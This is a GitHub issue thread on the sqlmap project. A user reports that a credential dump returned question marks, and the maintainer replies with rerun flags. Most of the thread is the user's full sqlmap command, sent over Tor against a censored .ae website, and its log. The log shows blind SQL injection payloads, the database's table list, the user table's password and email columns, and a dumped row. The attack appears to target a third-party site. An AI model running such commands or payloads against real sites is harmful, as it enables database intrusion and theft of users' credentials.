### ISSUE TITLE
Returned a bunch of question marks.

### ISSUE THREAD

**Issue by sternma** [sqlmapproject/sqlmap#1769]
This is the command I executed:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --threads=10 --check-tor --tor-port=9150 --time-sec=10 -u website/whatsnew.php?id=11 --dump -D *censored* -T user --no-cast --tamper charencode

Here's the relevant info from the log file:

`sqlmap identified the following injection point(s) with a total of 245 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
banner:	None
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
banner:    '5.5.42-37.1'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [1]:
[*] *censored*

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
No tables found
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
Database: *censored*
[22 tables]
+---------------+
| user          |
| ads           |
| cats          |
| city          |
| cms_vals      |
| cmty          |
| cnt_us        |
| feats         |
| logo          |
| newdevs       |
| newdevs_feats |
| newdevs_imgs  |
| news_events   |
| news_letters  |
| others_links  |
| props         |
| props_imgs    |
| qlinks        |
| sp_offer      |
| st_pages      |
| swapping      |
| tmp_sublist   |
+---------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
Database: *censored*
Table: user
[6 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| email         | varchar(256) |
| email_code    | varchar(128) |
| id            | int(11)      |
| password      | varchar(64)  |
| support_email | varchar(128) |
| username      | varchar(64)  |
+---------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7079=7079

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11 AND (SELECT * FROM (SELECT(SLEEP(10)))adsY)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
Database: *censored*
Table: user
[1 entry]
+----+-----------------------+----------+----------------------------------+------------+----------------------+
| id | email                 | username | password                         | email_code | support_email        |
+----+-----------------------+----------+----------------------------------+------------+----------------------+
|    | ????????????????????? | ???????? | ???????????????????????????????? |            | *censored*@gmail.com |
+----+-----------------------+----------+----------------------------------+------------+----------------------+

`

Anything that says *censored*, I put in myself.  However, all those ???? at the end were spit out by sqlmap.  It is a .ae website, is there some characters it can't recognize?

**Comment by stamparm** [comment]
Could be. Please rerun that same --dump with --fresh-queries. Also, if it persists please rerun with --fresh-queries --time-sec 10
